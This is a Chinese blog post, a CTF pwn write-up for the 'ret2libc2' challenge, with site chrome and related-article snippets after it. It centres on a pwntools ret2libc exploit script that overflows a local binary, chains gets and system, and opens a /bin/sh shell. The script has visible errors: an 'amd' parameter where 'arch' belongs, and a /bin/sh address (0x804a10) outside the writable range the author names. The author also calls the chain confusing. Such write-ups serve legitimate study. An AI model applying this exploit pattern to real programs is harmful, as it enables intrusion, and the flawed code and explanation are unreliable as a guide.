基本ROP之ret2libc2

最新推荐文章于 2024-04-07 19:07:29 发布
最新推荐文章于 2024-04-07 19:07:29 发布
阅读量91 收藏
点赞数 1
分类专栏: pwn 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62539372/article/details/129915236
版权

检查保护机制 只开了堆栈不可执行

gdb调试elf文件查看plt表发现有system的plt表项,需要我们自己调用gets函数来读取字符串'/bin/sh'

考虑一下这个字符串写哪里

用vmmap查看一下权限

 0x804a000~0x804b000有write权限 都能写

from pwn import *
context(log_level='debug',amd='i386',os='linux')
p=process('./ret2libc2')
system_add=0x8048490
gets_add=0x8048460
pop_bx=0x0804843d
bin_sh=0x804a10
payload=b'a'*112+p32(gets_add)+p32(pop_bx)+p32(bin_sh)+p32(system_add)+p32(0000)+p32(bin_sh)
p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()
p32(gets_add)+p32(pop_bx)+p32(bin_sh)+p32(system_add)+p32(0000)+p32(bin_sh)

这儿着实费解

gets读取的字符串放在bx寄存器中的存的地址,然后返回地址system,system的返回地址,/bin/sh的返回地址 就酱理解吧 !

真珠柚子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rop轻松谈.pdf
10-21
本文將對ROP技術進行詳細的介紹,涵蓋ROP基本概念、Buffer Overflow、ret2libc/ret2text、Return Oriented Programming等知识点。 ROP技术的基本概念 ROP技術是基於Buffer Overflow的攻擊技術,通過覆蓋函數返回...
带exp的pwn测试文件
09-12
这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc、ret2csu、stack_pivoting、stack_smash以及SROP(Secure Return Oriented Programming)和frame_faking。下面将详细介绍...
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 5016
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2251
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
ROP-Ret2Libc概述和利用
fanghuapyk的博客
03-19 1484
ret2libc简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有system函数,但是没有"/bin/sh"字符串 程序中自身就没有system函数和"/bin/sh"字符串,但给
ROP之ret2libc
酉酉的博客
06-03 1792
ROP之ret2libc 修改返回地址,让其指向内存中已有的某个函数 当函数调用栈的没有执行权限时,就不能执行我们自己写入的shellcode,就利用程序里或系统里的函数,libc动态链接库中通常就有需要的函数,如system() payload结构 通过溢出覆盖返回地址(相当于call system) padding + system address 调用system时的返回地址,可...
rop之ret2libc
温和的跳跃
02-04 254
发现很久没有看那些理论还忘记了。理论还是有用得看看的。 ROP例子还是https://www.zhihu.com/search?type=content&q=x86%20ROP这个 我回顾一下ret2libc (本身就不熟悉 : ret2libc 全称是returnlibc.so 意思是跳转到libc.so这里 .so结尾在linux是代表动态链接库 里面包含很多函数,当程序运行到需要链接的地方就会加载进来。 为什么要使用这种办法呢,当程序开启DEP(data execute preve..
[PWN][高级篇]ROP-ret2libc基础知识
网络安全知识分享
03-27 2067
ROP-ret2libc基础知识 前提知识准备Linux延时绑定机制Linux演示绑定机制的实现延迟绑定对我们有什么意义libc函数在哪?ret2libc使用条件如何使用libcplt表和got表的关系整体的跟踪 前提知识准备 Linux延时绑定机制 动态连接的程序调用了libc的库函数,但是libc在运行才被加载到内存中,调用libc函数时,才解析出函数在内存中的地址,为了帮助程序更好的利用内存空间,不用每次把所有的函数真实地址都写进去,用到哪个查哪个,之后在使用就会很方便。 Linux演示绑定机制的实现
ret2libc
最新发布
2301_79863983的博客
04-07 661
以wiki中的libc的第三道例题为例,理解libc
ROP-基础-ret2libc3
ATFWUS的博客
02-29 2127
文件下载地址: 链接:https://pan.baidu.com/s/1IMZt9WIlXDZBX2J-hoCyNA 提取码:jrsx 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
栈溢出实例--笔记三(ret2libc
一只青木呀
08-07 1354
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
周玉川-2017221302006-第三次作业2
08-08
攻击者可采用 ret2libc 或利用 Write-Protection Mitigation (WPM) 和 Return-Oriented Programming (ROP) 技术绕过 DEP,例如将 shellcode 写入不受 DEP 保护的内存区域,或利用 API 关闭 DEP。 3. **GS (Guarded ...
pwn相关的工具的命令19_7_151
08-08
总的来说,这段描述涵盖了Pwn领域中利用返回导向编程进行ret2libc攻击的基本步骤,包括查找gadgets、分析ELF文件、利用GDB调试、构造payload以及理解动态链接库的工作原理。这些知识对于理解和实践安全漏洞利用至关...
攻防世界pwn题:Recho.doc
07-13
在尝试ROP技术时,发现无法使用ret2libc3泄露libc的版本,因为机器一般都启用了ASLR保护机制,libc的加载位置会在重新执行后发生改变。因此,需要一次性完成所有操作,也就是get shell或cat flag。 4. 系统调用 在...
二进制漏洞挖掘-栈溢出-开启NX未开启ASLR1
08-04
相反,我们转向ret2libc技术,即通过返回到libc库中的特定函数,如system,来执行我们的命令。在这种情况下,我们需要找到system函数在内存中的地址,以及"/bin/sh"字符串的地址,因为这两个元素都是构造exploit的...
周玉川-2017221302006-第三次作业1
08-03
- **ret2libc**:不直接跳转到shellcode,而是利用已有的库函数执行恶意代码。 - **WPM (Write-Protect Bypass) 与 ROP**:将shellcode写入不受DEP保护的内存区域,然后触发执行。 - **关闭进程DEP**:通过系统...
eLearnSecurity 漏洞利用开发学生笔记(作者:Joas).pdf
10-06
"Return-to-libc / ret2libc"和"ASLR Bypass"是两种常见的绕过防护的策略。前者利用动态链接库(libc)中的已知函数地址来执行代码,后者则涉及绕过地址空间布局随机化(ASLR)技术,ASLR通常用于增加攻击的难度,...
工控系统中PLC安全漏洞及控制流完整性研究.docx
07-14
代码重用攻击,如Ret2LibcROP(返回导向编程)、JOP(跳跃导向编程)等,通过利用程序中的正常代码片段,绕过DEP保护,实现远程执行任意代码。 为了提高工控系统中PLC的安全性,本文着重研究PLC的控制流劫持防御...
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值